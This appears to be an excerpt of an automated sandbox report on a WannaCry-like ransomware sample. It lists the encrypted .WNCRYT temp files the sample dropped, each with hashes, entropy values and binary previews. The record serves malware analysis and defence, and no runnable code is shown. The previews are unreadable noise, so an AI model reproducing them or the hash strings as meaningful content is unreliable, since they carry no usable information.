                                Entropy (8bit):7.82054758729429
                                Encrypted:false
                                SSDEEP:24:ba9CvlkQ7njPiKJaQb4ngoWMtue9QAEgQlu:OmkQ7njaKJz4Z9QOQlu
                                MD5:D524A0762BF0695AA8F16F780B49AD46
                                SHA1:FF98D8E165CDB60B3F399E38CFFEF2D3A160AF25
                                SHA-256:3E2B096488AE9B37BCC075DC7FF921ADC9F8C6EC740EAE450A823F7DEF0AE30F
                                SHA-512:F2FBA3664D1643AC7027364A9DF96FE55A998BB98EC2E23434CCFC7880BED111C684E52C9E99743626678DC75456A3311CFC0AB2FD1B480AF3474B921E8BD5C5
                                Malicious:false
                                Reputation:unknown
                                Preview: lr^.Z......B...&;.0U...;.:...=..\8..*N..3'.y...6.9.C......O.S..I...J..H%5.1k..._..5...".8.....P=1WM..w|F..5..v.Y.s.g.RzO..{.(..d..L.s.tv.5..Qk..%...1....jE..I.....gS;(.....Ib..=.a.iIi..^<.#...:Q..+.2/...v...7.b2..-?.9.....@.-......#IO..6Qu7....xn.X.XxBF..2..N....V.O... W.[......'..DH..e....B.\...j-.Fw.._?....hy.<b....f..f]....... ..Z)m.....z..Dl.....na..(62......(..)!.Av..B5s..r.....0?..d..6.......6..JQ..k>.6$.......Z.:..9E(.ir..P.xn0o?mI;A(vD...............c}..b.o.......8.b{...*.P..fy...Q...j.^.L...fk..0....y._.,"2.....3..4....rAtT ..E~.i.......z.3........V....&.Z.Y........zM:.U..].z.j.d...i3.&.H.(.=?......Jr....x/m.p.MI.G.W!....6.yfh.u..3.S.J../.lFl........p.N........`Wom...D&m2...4...N.$..8.W..A...d..}|{. Z.H}..DGQMs$(..G1....^..4..s..y..=7.LJj.D.o.2..........:q...T?.g%.s...:.Z..l........*.Xr6!!....Bq..F.e!.V.[..Iaa"4~...v.O.O#".z.....$K.kN.)*jq.X.*.....F.......^q3....1.U.}.%~.....g...t...u..9.).f....D..".....J...SN.....[..M.L6.(E

                                C:\Users\user\AppData\Local\Temp\1.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.79464168243227
                                Encrypted:false
                                SSDEEP:24:cwoFHMpZblrHQw5bkdjNEjllbtaRLkRswbMQkvZ:EOZl5SdjNEMB
                                MD5:C34DE4FB2F6C2FB50A9854DD07018C79
                                SHA1:A61961E7AA025657559612B5C8E5DEA261DDC6C9
                                SHA-256:BE70FE8169CC6987116C491DB38453136511740DCC1BD460893FB70EEB4691C8
                                SHA-512:434C8337370392B9648CE2538A1788350D75C6D214383AAA74E9021D596908627EE2EABC5B575190158EDFBD874144590378F58F2EE79EB5957467FD55CD4E2A
                                Malicious:false
                                Reputation:unknown
                                Preview:..R]@;.b......3..e.`.^.,......^-m......7....nf^..,!l.5...~S;..t.G.R.sMQ......N.V.f..u.9...3;.W.mP..Q...f....G;.Vm&...*.'.l<...!>.F.L...H.....>..........5.K.-T.......V.4wy._P.Y.I.)..Sv.s..qg>F.y.ny......i.....n....Fi-.#..L.#...?.l:......mr.....J..6....;V.r..z}.Z.WVp.....)..Cj.......-....d7.!..#.../P.Q$..e...J...5e.3(3......,.Y+ VN..Dek.!...i..$...*+3.-...j(.F*A\r..o.~V...[.r..S...K.|^..H. ....U.k.e....t....1E.Byu..pc..%.I\q.I.}.M.^W1.41...H.....GG...4...qH...o...-G.T....b.'XB..I..')..N..i....c$....`......3..q.......".O..0l.1G.{n|!.....&k.~=...#~....@+L#.-Qk..?> .F..^.'n.....U,..B.~de?.q.DI....t....&.6..jN.lp....,.O..+.:.Y..D^i$TI...K(.U3%.{......&.f.. ...Pf..>e.fhV..`...1.%.. ...)...fk...KUE....NWT.G..Pr.>s(....@..X?b$.O.7...f..{..O?k..[.S....\o.3..C...+.ji...\M8@....E.l.%....(q...?...#...].....B.?.4..V(.yT.C>.',.^..x.^....g.....M}.<...B....a^1%......,u.~..q.T.U9...A.;.0H...b...V..u...a.Y.v.gL..b........M..".E.a..-....[..'y..H`.....w`.V+7..|5M7lT?

                                C:\Users\user\AppData\Local\Temp\10.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796805658692537
                                Encrypted:false
                                SSDEEP:24:RObUjgDAZr44p48g4DTrhsYRQ4QZEXQrBzsItyBY8V3zF4DoldPoPijf:ROb6T48gm523WXCzJtyjdvlmPi7
                                MD5:4947EDCF59AA746A1CD542BD88B3A7E0
                                SHA1:1E6AC68900C039D09271D1CBD656F0A5C8A2A394
                                SHA-256:5128C163E2072D84C1382236D9A859B2D1A920B01F1BFB1FF842DB81FDF324CD
                                SHA-512:C265B0851E6AFF4CFBB311FED68D25DA3AC59559D3DE3EA9A5B39DA5312F9829577469F01FC7349A5E451A7390767A7FE26BB398600EDC6E603038DD8C53B13F
                                Malicious:false
                                Reputation:unknown
                                Preview:A)....O..B.7Z.wYq8o.B-.&.......o.$}.._.S,.D.~....oN.&..u...^.b....B.v.H.._......"ba...o.....%.v.N.....*F.S(.6&..fAB.>...w.N8s.g.u./?...@.a..+af.L.A.9Kp....!.!.%3.s.....r.D3J..f$.a!T/.)..4.qi....@..{PA:|9\.=:.rNl.K0w...w.3...~9"v./....3..II...N....!W..3.o.Y=A.R...w@"c..HK.o...t..^.<.<.....W......(..B"...7..12..8%!.N.<:L+..&}.@.x.m.^....i@9N)e../....Z...Zt7..3..ZP).K.g)..x,H..NM.|......8........*.m.\.4..y......(W..G.H......"}...B..&X...`.....>.....)..........[.".ro........V..9./$.k.?...f.b)....l...7...:z_..1..o.....).....vq..40.s...%.."|k4.&._.#....c.....xo..]..a...?...<.7......Q..Q...&...Rq.=...z...e.[..~i.........)..../..q..x2;..[.V.x...;u+....M{.z..T.hjd.gX.`T.......w.......g.."s_.e7h.Btn+..Mt...>..q).)...v..-T.....n.HH..T.}..m......"A!T..^a.K.4.b.jm."..i3........t..Dd..R6..4.e.F..x......b.B..t.,...w..{...~..|..7.$.(.{I..........1[a.l.Z..Zw9..7/D.}y...m..x.a?...f.^..l.....;...,2......4.KA.H..-.|#......,.....iJ...VY.$.g..O.y..X...T1N..

                                C:\Users\user\AppData\Local\Temp\11.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816975207396427
                                Encrypted:false
                                SSDEEP:24:QCJ/LKhCR+TfyDi5hWUYIJ1H/4gqVhRsl+Q8ZV3xXta:DxL+TkKZfgg0gjcta
                                MD5:F7ECD6F0A4F0DC4F6709DB062FF1C1CB
                                SHA1:3922C1DD149179529F42F1EF503F18AECF41406E
                                SHA-256:604F77011900E78218152CF67D86960C20A2F6C8B733CE591FC526A4908ECB86
                                SHA-512:6B7716EED40C70A414AD78EC7900C53B3571706961C1CED115A659475199993AAC0D87213036679C2116F3186FB53D88F0C060D1BF52B4A5D681CBA5BCA158F0
                                Malicious:false
                                Reputation:unknown
                                Preview:....9...'}.].N.O.v6.>!-......`j.Ew.wW/,.F.Z.w......."yoM.)|".....D.+j'...}......D.T&.b...... ...T....5.C.X.......6:.S..2...c..q.8........A..."..*......SD...W,..R.x...G..zw..S..3...N.F~....R....8..4...p...@.....i...... .V.h...k.<.,.N!E.........Po{|._..Ns[i.....}...V...*8%y....@....a..? ..R./....B...?#s.8]........}N.&....fn..).k.K......C..<NJ...W.....~e#.b.....P..."..6.........C..<..g.]..9.UxNM.....j7.e.3a{.v{......^1p./v!.g..7A}.....}....%.s...})..<......2rp.`-...g....7 Y....Y)Sn.."..W........3.............O]....;IHH...t.....p*....V.|M2J...(..<.[?.....?;..V!...8w.G[pHkj!1...&..'.H..)...S....y.0.z^..5U.l.v......|7M........%^.aJ...\a.@N.o..a.......AdU....YI.=...R]{I...-...N...".E..._.JaK!....q..A.j.N..~...{......u..|....qf.fW.y..-.cZ..>...........8.....7U..].Y.OV~..^...I.YQ..Wgs.]...-.......1...k....}^.+./.".e...27.c..h.$~....fw..,-.(WS...F.}t.....".7...p.`.q.w..C..5.....D......6.......o...}..1f.0...!..}Q...1.Y..j..j........f....;K..

                                C:\Users\user\AppData\Local\Temp\12.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.803036648864622
                                Encrypted:false
                                SSDEEP:24:63gosUjTZ7Yqjg+DDRmEPrX8dS/GkcP4ORN9OYMUjE:aTR9VPRmEOBP44N9jMUjE
                                MD5:D380E9430EC3C916615F414F70A99D18
                                SHA1:6489F23BD40C44AE0337423A2DC43CBA6EC84EBB
                                SHA-256:A25196FEED0198DF77D61635729AF0995912FADC6C906E7859888952B781180F
                                SHA-512:BF15FD186486211CC98EF2CEF40B6E66BA6723C8660EC2B5BB42BBFBDFCF55458B4C91DC845D8C5F1C7B4734272601D6C2381C0E8382BBB52731A19F3B984E9E
                                Malicious:false
                                Reputation:unknown
                                Preview:...H...p.@.u.wl.% .4......AZ.y..u........EKj5...t.lE......U...;..I..]edf.. 2oR>.}.1"...D.#..w...[a1Z....!b.7$..J..o9.....;...='...\w.........._l.....P.............)}..... ..>r...$...>.....In,?=[aepN_.Wdy.p..E.2.O3p.j......j^.+...P....v....W?.j..l.qG....."+.....8..C.U.A./..V..3.<".0...f.hJ.....C.F......>T......3F.<..1o.Uvu.........i....#.B...*....+..1..g......f.k..I.<F'.@.5.r..e#.^..'.U.P.G..b,.H..e.ce...&."....W..*.,..;d.?.P.5t.....F....Y...!.b..+%0k....L.0:q.18t.Sb.o....B...E.$..lub...Zk.;R.l......GGl.B.>....L..dt..= .....9..U......{.......VF..Y....3EJg!|}.].Y)..,...........Fa.C*bU.d...9b}.......A..F..?...p.6..f.......?...{.T...'..P[6.<..S.U.@mDf.@.8f...X......SG...ow..{}U.=.3i}zF..=....w...=.DLq...%.+...y&........<..58'.rJ<C`..L9.W&g.C.P.>..I...1N8W..x].......6.=F...w..,bz/.........6...?.m.....@..1..6-....&.*3.mY...B_.>...w..-L....E...`<.L/Ak...L....+.V....dy..%..@v.h.A.......0._K..Z.|.d.Px......iY...q..7....=TI.M._.zR.[L....!G.x...2.

                                C:\Users\user\AppData\Local\Temp\13.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823508414706776
                                Encrypted:false
                                SSDEEP:24:cSEeJLSdKuxe/9qQvFGOOu815e1nkQC3fd9ZR/H8zi75:cmLrD/gQvFGbL1wtkQsjZq05
                                MD5:E531D7DBB5C2D74868AE5FE3EBD3C215
                                SHA1:79FBB4A5CB79BB2AB8C70C8E5E6E034341BB30AB
                                SHA-256:9A296B59302919774850BCE22244D71429CF412418C126AC6EC6DA1C6AA7F1DB
                                SHA-512:0A6B8D339619BE8130D2B35F42990376214A7B9F71B3B613482197589F37D3012003B93986563CC1DC49A7FF1A8DA10BD4C424E25896F95190E31AEA69F96F0B
                                Malicious:false
                                Reputation:unknown
                                Preview:..{A.....O.XR.".L.]...?.._J.Pvc.MB.{.....o9..'=..R..>.'.JD.9}..EPwMj..0..g.[...4..\".Xs.Uz...pv^.W.........f.wgo.D%.E1.f......@X.0E`.....u..+...e.....P.n.-js..l.aN.ZB[qH.B.NS.*/..:.......gV`gP'...<....h[..._../.......$./>../.....p+_......Z...{S...g.4...?n...`...6W,Sp..i...+k..h)0ks.^.;.+G9Wk7..:k-..6~U.h.H.t~.....&...r+...........b...P....V.f..2.I5v....0...e....cj...V.......CHX..o=g..`.V.....J.wY.M.....]..(\.......\.V.~..m=M9..L..=...A.K. . ..be..V=.zXLr.<.K.G...SB..K.g..O..W...&1.T7.9...A%4J.-.z..qCB..;l.P..o.og#9:....;.......r@.Q.!)%....n.&....Bf..#|.9.".....V...7Qdo.s.g...G,..j3./.\.E.q....>s00.r..s.m.>..j...P..d.P5..@I|.*.........YE.fP......dJ(.. N&.5.O.H....1.R-.J.<.)e..iB.-.l...l.4?X..z.I.s.|.*B..B...car"&z07.S....\...7..0...Pl*'.....;.....(...9.....u..c..[O'+[..3jzk...FU.vw..L=+|+U.b....z.....%..._..:.8..j...q.G/.....J..F\.....>i..._L.).Ju+U...>.H.....4W^.x.....r.p.......K!...9p.F..4.>...]4.....G.~k.:...W...........%P.X...IQ....!.

                                C:\Users\user\AppData\Local\Temp\14.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807981005733831
                                Encrypted:false
                                SSDEEP:24:Mcx5jh68dTprtSkqZOL0BbPa9omSj9uzoDkDT:DTTpxShOLOrmSBuzo4P
                                MD5:77205474DC1784F928EE5888A1F646BD
                                SHA1:E68203E0D04FF8087DA3C50FE58CD85DC6400843
                                SHA-256:C40580AF0358D5A521898B82B70030E53A1FC72F1756ADE1FBBFBA7B6D62CAE4
                                SHA-512:6FC11775F7F4F72D42D60A68D98B61B8F4AF581509421BF7954BFD7F67ADA99E132DFF490F97DEEFB61D044243E8AA38295391857FFF22FDF291DCBE7CF1CF28
                                Malicious:false
                                Reputation:unknown
                                Preview:.p..6.9....N.`...5a*.oo.._.$.2.I.z!.;...W.[...e.^..X...Ma............vgZ...\.....'0..].b....'.#f;..ux..:bk..D..o26.H. .=\.....kh|B.;...9.k-DG..A........2dV.z.E.(/.%..5...!...7iI,.[~]...\.mP.`;..,d..s.y0.L.......GEC......2......:G[....B.*...6f....H{g........X...h...J...+.1.hH.Kg...W....5..x..:.\.RJqZ.....?.. .5.......1.....Z,X4..7DL+4.....<.thhwf....u.n.e..w.*.9....9.)...P#..T..#).}Rgy."...kMH.......;t..X.b..\.e(i.G0.......(.r?....&.xq.V.S.t|1....v[...5.......4.}..%2t\..?.(.[..Fz.|.f.."O....p_.md....9~...V.r.../!.Y..8r.z9^..Rg.......#..Q.V......b.e.)nM.d.g.M...T..=......a...\...H.H......u ...}........<_..kU...v..5L.N....b.._~........z.epu..L..U....X.;.M.c..>.#8..{@............g.....IV.............5.I.../..mY..U_\.@...@.<C..jW..]..h.a...yz.........)...f.0D.....M.a......U....r...6.'<...)..}....P.&.A.l.{.?..&B.. .d..s.W......0[u.1....3.>.........|^_Y.....$U.......6...`..P]......Z2!07....M......e....c~.._. ....@{i".S.

                                C:\Users\user\AppData\Local\Temp\15.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.818267296582887
                                Encrypted:false
                                SSDEEP:24:BTmstLBJY0ipGWXYW23pxraT6g6E0wJvq+rBiGmLOXZ:BTL7YdGpWkpu64bg+81IZ
                                MD5:782D4AA1AD11AC86EE6A39F845787541
                                SHA1:CD0637065E7412AB7231805F69244B8DFBC62F18
                                SHA-256:795D3EC64DBD3227ADFC8FE6FF859A4E0DB749EC6F6C5208FC913771B99E4386
                                SHA-512:04726B4FC69B12A19274BEDE741AA47E2519D23EDA5E08FFBA8C0CA3D67C702DBD072A4129BA7B30680868D73EDA391C0ACD3A0335BF0ED460CF132828F642F5
                                Malicious:false
                                Reputation:unknown
                                Preview:(2..`Q.5..nF.JE../......X....:..W....ydq.E......%<.{.......M.8.[=.Pg.,....l..wLr.....v*@H.:....8J.Y..u6..r..d=G.&y.3...Gg.F._+a..rE^...Fz"..6....`.$....7.L.........KB.....T..3...zd..`C.aD...e_A...3G... ..u5_.!.N....<.F...."...Q.-..........x.5..j(8]cSu.+.<R0.Q....=.i..Q.@....V...D.....N...Z...[...S.I.+.9]...]2..$..R....I..A..G.1...5.j.......7..mr^....E..7&...........".....%0...i.R....!."C4.....j<)..T.0.A....T..........z.7.X.t..._.../.|.........P.-...!..pn.z`}xf..Y......{.r.../C......Gi.R...j.i.....G.r..Fy.p?.cE.F..~mQ.....CioA.B.;..m3.C..H.L...AH..M.Z... ..b.@...q4..r.....hx.N..7..........z..t........3..Q.0..'.b..../..L...>Iv....."x.D.*X.n+.6...M.ECR..K.....e...w....n..T8._..+.?m.....&.......|Q...C.@...F..7...<2..9...h.....xw...j..v.[...H.E.o.......J...T.d%......Ok=..#...._-.|.SS.)..Y.Ls...../6.j.{...s.S}.`....Pl...<......'?......CHY..U.`..E..@A..Z.S.`..V...o...L..o...L`O..6*.P......7X.tk.PH.@_...VYc1.rL....5 ..7.......i=.].r+........

                                C:\Users\user\AppData\Local\Temp\16.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796441820550681
                                Encrypted:false
                                SSDEEP:24:5virJCATcPE2sbbMilfrJdb8dN+3KU8arJfy3R7YfS+pKF4:5vpf82skur78dw6MrJfcCoK
                                MD5:5694350CC437C5B99765EE5F7599A50C
                                SHA1:CAA1B663EFCF02939BF41F4687EBE02B244BD414
                                SHA-256:D83115D6B0E430C989644E71FA544AA03A6FAE1E2C4AB5E52F6F5C258D0B7897
                                SHA-512:1F511800DE2204BE3FB4D2C725A8167F7FB14CA3E85FAD2E8720553A90A24E64C587F746566C63CE34F3CFFA71AA8C6FBA86E231F9B9DDA63D427F2AA52D795C
                                Malicious:false
                                Reputation:unknown
                                Preview:..]...C.....8..^......."....b.R(.%..x..*r.7...u..w.G.~?~..S....V. P%s.h...A.A...[u0.qE...8..=D..F.V.F.qx.uK.<V.%.\0L..W.og.....9..R...9....h K...W.M........V....l..Y..S..J....L..W.2...W..W:....-8b.O'9...X.f.AZ...T, .'.....\$....Sd..^.u".:.y....Z....(.W.....|<....7.&.U./'>...]bn.{.......(L....;N.Na..1.|D9...._.yC......G.k...B.4......)..g.{."..U.......M.G.....VcO...E[.;.........Y...6a.."t.<.=.h&.9._....N.p.H6.....[....FK.r.3Hk.Z?J...M.pg.....K.L...bLK.T.P..2`...:...<.....H.......P.L,.N-I.grT!j.Gg..z.o..>...[..`6{x.<...VQ..s.....>.[t.Qo.Ry..Q.F...0j.W"5%.5R...+.*.LZ....ti.'......z..$!t..?..uV..EP..5.[~...}8..{.MY"...y...e&Z.\..MX.....G..2.M....R..sV..q..../_30....x...S...cP....!......FM........qy_......T]z..+...A......[Q)8......~.E.C.R ..fZa.{....90b.....7".j.......X@...z(b./Qg.=..2.]..9%.........>...aH4.........VB~.......U,..~. ....D...o.Y..........w..3_[...0m..,..~..j....'.h.e....\I.cL..HEW6]Y..._....=O.N.~.......4_..G.1b..e.?....y.N..

                                C:\Users\user\AppData\Local\Temp\17.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.795318270694324
                                Encrypted:false
                                SSDEEP:24:XXcQh/o8RhN+hMzWHsrbBdQiloENWo/gwnPphN35rVP9+:XXBTahMzWYbfQ4LEoRnPzJ5JPs
                                MD5:6F7B6A4B9F5378EF0E8174D0A919076E
                                SHA1:FBC1F490620F894EAF6CE435425829BCD1D4ADB5
                                SHA-256:F14ECF9B51D3E440A8AD1438B11B255EB8E0CCBA88F9AC7BE33B61278713F436
                                SHA-512:AEC5CDD086041E34A14E2FE8107DBBD6B3EBE37D087570FEDEAE33C86AEF75994F242F5430104EC7DD5E47BE7FA445E0054B3399FBD1608F35A313655C6B968A
                                Malicious:false
                                Reputation:unknown
                                Preview:-{Bj...->.29.SS...l3...v.la../d)..E.~K.w.e.c..e.z..B5...t.QV.#vD1|.....lW.f....-........S.Q...M..:....Q.>g.Vj5..........H......;~.....x4.Y..8..C..|...rae..,.b.+..!B..U.F....U..,..'...>4Vq..*C..-.^W.?a.[a..t..8...|..Y....@r..>>==U....V.....r...c.,..t...%t.....a..@.n.|....D.!.|.[..i......+e........U...2l}.>|..Tl.I.......m.M..J................}k...'.t.'%..N.H.....F.#.h....C{f......}..jD..}..^*`E.....;..d.g.,u.......cid..F.......)d.5.sc.....E.])........*c.gs...)r.@W.S..9Q.........{.....LB..1Yh....e....7..L.....i..9...Au.g.j.6'?E.....a.....G.@.'..8...~u1].....6.y.x..b....4i.4_q....U).O.......=...2..!.5.........7c...q.....>...[..(<.....E.E.Xv..~S..'"...Y.jmP]..:..;.+.ac.=.i.._..K...H..G/H._...`.b.*.l....$.n.qs.w.$G..,~....8z..Gf....."|.D1.zU.x4\...c6..u..b..r.....Q..g..]..Y..][...+:i..Q....m...wPi....:Mv.;.Ih.6..:3e...D..N..+.;.~...yZ...|)h....v..."..y.........F.9P..%....~..K..7)......g.T.7 ..S.Y.L..G.p..q..=i...k...r..&.#.e.r..S.RU.....

                                C:\Users\user\AppData\Local\Temp\18.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8104928499402515
                                Encrypted:false
                                SSDEEP:24:4+Zr8xJi0CzUmUvWiUJ8+dOel73lP98ggP76a8nIH74:4i8xJRCfVW+dtZ67PBHH74
                                MD5:DFF975324BE65D819D01F7A2688AF7B6
                                SHA1:E1711C87D624B64ADEECB923F76076CC678D0E5E
                                SHA-256:4D40482E3483E2475965DD1C89EF9FF7B58B51EE60DA7B59C445DCE1CA64128B
                                SHA-512:06153A50903DB16B221E344BA361D9BA8A9F923336508E1B0621947D7787C6308732424063714C195440AEC5AE8B2AE58B17D9D6046F747002A9EAAB755711E2
                                Malicious:false
                                Reputation:unknown
                                Preview:`..:fV..*......n!.<.q.+...6.lp*.].Ea:...Z.H.(.].....=.E.a.....A...E....S..?..K>c.Y.)...;.r..N..z...q.n....S...f....zU..q6.@.9f.q.J....... o.....*q......).[.gF.'...}..m....m.-..*.=..`-...&R...-..s!}.Y.d;....[....S..C$,..._..."p.4..[R.[z.n..(....X.......>..7.m.(..J....V.NN.....c....=.>..h5...;.....l....g..8..`...,.,J..W....F....46B...^..R~$#...HU..S^.1.t.jb....s..}+.w....<...&.;..-....F.#.}g..).r.0.F.~......h.|....q.R.#DaY..wNR....Ox.V..-.W.o...?...-.^....0.9.;j:..;. ..t"..`.l.......)1......PmI...:........AN..8.. ......H..K.I.....)..+.Z....8S...4...E..kt.a.....|n.......G.+./.0...6..2.!y.....T<.....%.9.K*..F..@.0.-...f.M...w:..|...|..}i.....L....B.N&7tK..F+.....5...ao`..........jnu.L.L5h...O........~....~K.].t./:. F..z.:.k.N./,..7^....;..*.e....?...q..5.:A.u<w..fA.5.:...`.N.x.I.9..q.H....\..+$...Q.. 3......j6.*s.....$#....xM..k...D....*.|p#...P+...m.Qdqg......<.U/....g[..S.pdh@z. ^.?.0..h...x.H..X..M..{hz.k.x.j.'tm...v?.]&...).....mn.........

                                C:\Users\user\AppData\Local\Temp\19.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8006151324953565
                                Encrypted:false
                                SSDEEP:24:53Qj6hHuS8vIY+bH/wzU3L4aqtdOnbTO3CptIfa:5gjNITbYg3L4LYTOSvIC
                                MD5:4B6E762FC13C9E8CAA9FD63655984795
                                SHA1:C5ACC1D73C41D651D506DCBE3E0C61232AFAEA61
                                SHA-256:3311C36FC48E09A654FBE97AE58AC1A67212BDEF51E66AAEF330D588E9CE0E99
                                SHA-512:2F365D00E352505DB4529F963F450CF2153A4E0B4C88C360F4366B206BE82EB660FF78843C716F92E0433FB6A7D3D68BB5F6AD711962B3A8BCD135EDD592D500
                                Malicious:false
                                Reputation:unknown
                                Preview:.i....}......E..Gf.k..3.".z.:.$.....hd.g.<;...+(.e....=....N{..9.s..DP..P.d........al}....BC.Ru.Up]..../.z._n`.e...5..]!..w.......D.#...<...&.&..[...WE,t.I_.<.k*k..4..|.....S........D/.|Rx.,.Yu.......Z.4@.S.].d.^..."E.y.................$g...KJ#Uq..h....^".k..o.3....q.<.%....w..b.....[.T7..$....\.4G....=J..g...9.g7.........44.&..Z....(..1j.....(..b7.t.AR/.A...h....jYf......k["J U.h.l....$.!...0t.....x.i.Y.{..^1...c.K,HQls...L. .<....k^f.1.m.....S$..cJ...|..K..eU..0u.....[.(..2... ...N!..!..[= L...u#... ...-.x.>....F.......#,...x.@i...X...kfV..^.$.Q.<.t...U...........j....`..o.P-..4NT..t.,1....U~.7.a."D..}......*X.II.$.V...{.%|..E...G}....y/....3...e&......r.?.L.....B.....wlx....E...B.......U...es...|.......8)%)..O........n.@......f5.3VP."..v)...GV.~.i.L6......b......)W...).5.$...'.7..x..w)c..#....v..#..R.n...4.=.Fu..,....9..q.mW..NSS.7....\|.yP.C<..h..Z....T....d..*mq;......R....xm.%...v..p\Tl...z.#..u.O.......v~k..t.r.......pg...t.5..H.....

                                C:\Users\user\AppData\Local\Temp\2.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.766652737060187
                                Encrypted:false
                                SSDEEP:24:AqPboGN016VeNrWA6GNGaBnM1gGMJe29L+cDzcRLBAqlXhKEr:RPbt0oBf12ntGM19LQzlRKEr
                                MD5:15D4394291D092B614071D85D42E4BE5
                                SHA1:8BA91814215392B152A954ABFA776041AA1E5E68
                                SHA-256:2016F58DFAA698D0A6B9E36412DEAC207EF6352F19B98E42FFDBBC932CB3C6A8
                                SHA-512:2B781F2349A9B3369E5C9B8078C6C3E75BC17322B47660B48AB76707FB260F5A58AF8981B54DDA76E9F4F08A0F6C08AD8DFDCCBD3EAFD02844E7847FA3DF3504
                                Malicious:false
                                Reputation:unknown
                                Preview:......H....a.Y....'7.{..].........=.5H.g...'\.c...... ...E.$_L..... d.Lc.[..c.....e,L.sO..L.d&.^....'....b.*.e.(o..k..$...A.v...P=y.X)E.....:....]7...0..N}.0).|h...A.Y(7.(.."...c=........m..3.n4..+....c.|...h..).g.i.:..>hU....1..=C.....\.q..Qe.un24<..U....<N.;N......B....X.nP"...~J,...r..?.i..T.F.H.../."'=y.8F.......@!...2.`.....:P=..lMD..%.D....j.R.J.gN.....B...^6H.s..../......J;".IP*mz.h......e..;.K.y.J...\.@..@.x(..g...4\}....{K.#r..).,.....yfF...NA.\...N...T~.......].k1..9F#......a.l.?.f.W.U..v.R...t...aQ..jxO..3...#^.~..T..tjN.ub+.Q.s..5.#.....~.0M....EDX....%j.*.....).#..W\.....L...h..Q.<P.I.B......s..=).(..j.z...:c%.sekc..s...bL...2..@.s.........<?8.g...$..=..n7.:...taK...;Eun.G.......7..I.J..eo.!.}......[..}.:.../.........K.B.\)..(.~oH`K..KMe..D..}O.....A.........[6:..}.EB.AQB.. ..nY.hN.0hb.87.)Y..J.#.e......w\1.P...?}...[<."a.T.y....B6.b....<%..5..w~.o^Z..mD..?0iM..^{_:.....86...h.~...r.#...P.c..:...q..z@$$...I._...Dh.._IlZ.....{

                                C:\Users\user\AppData\Local\Temp\20.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.797593287627818
                                Encrypted:false
                                SSDEEP:24:Qe3Lwqwyr9demoQBnSeDKsmcWdC2H0mtCLsh/cO+4yYjX9I3bPjlj:ji4e4+AWdC21gG+vYjMbPjZ
                                MD5:8E2C32EA0DF2819DFEE0939E763A8DBB
                                SHA1:3C70BE2622670B37C07CF4CA9330ADC2E14714EF
                                SHA-256:510FA14834BDB89F1D30A7A8CA7CC29E08CC2F479AEF1D2337D15EB3CE251D5E
                                SHA-512:51D0830DA4BA7D1FDAC35B6AEB315E25F6B264931A5A0D672C74F322C381910DBCCAD39B07B16D029FB480C41A7BC67724EC0595EE5691CE5475959F0A5BF3B3
                                Malicious:false
                                Reputation:unknown
                                Preview:I.J.M.[.scn.[..=...t.e.......8s...r....L\+)"...F!.lY^.t.?z.o..@..yn...4..s[%.../...y5.x".*}6)t.9..u.b.m.$9..4..$.@......se(.......".f5.%....>.yK.S.p..).L.i|.O.P..3....n...*.T.?..`.B&.:......K..+A...s..Y..j.rT...5.s&.N...)..}..-$.:.<..~a..c/..$...A+.i...'..mY.(......@JR....:.:..To...{...P...-}.:.Hw...p.....jl.UE../X.*.)..M..D..B...{)b%..(....c6......:ob.6.p1.os..-.|;Z+R.......Q.8c?.L|..<.6`.L`.=..2.....x....b.?9.n.q...D..C^.Hy..2.?../zi.CK.I_...b../H.nk....<...VH'...yx.0:.JU._wH....r......w........)..q............yB.o.....U<.w...q.....R..SnI....7.....V....sY.C/...9.SE....d/Q>...6.ZZ...0.._...v.DUI.c...I.$#..Lp4.....L.K.~D.....xQj.....j..]....5sO....~cF.z....0.......^k=w.W+...[..\...|..k.a...C.>.t.j..5...s:O...F...2..........*.LC.r..4/iV<....sa.Ai.Jm.....p.u2P.4.!.al....vcKP...K....6....s..r*......mU&.....2e...!Q.~.............H.....{.........r..3z..[...P...s.H......\....O=.F...H...}.GZT....<.8..8..*5.}.V.U...^8y...qNY...D.:..P.....

                                C:\Users\user\AppData\Local\Temp\21.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.83354903957755
                                Encrypted:false
                                SSDEEP:24:GtwVnN2yO3IaZHxTu0/1NS08de5HvYAxsWjGOAxEg:nVNi3IaVxb4+DGzxEg
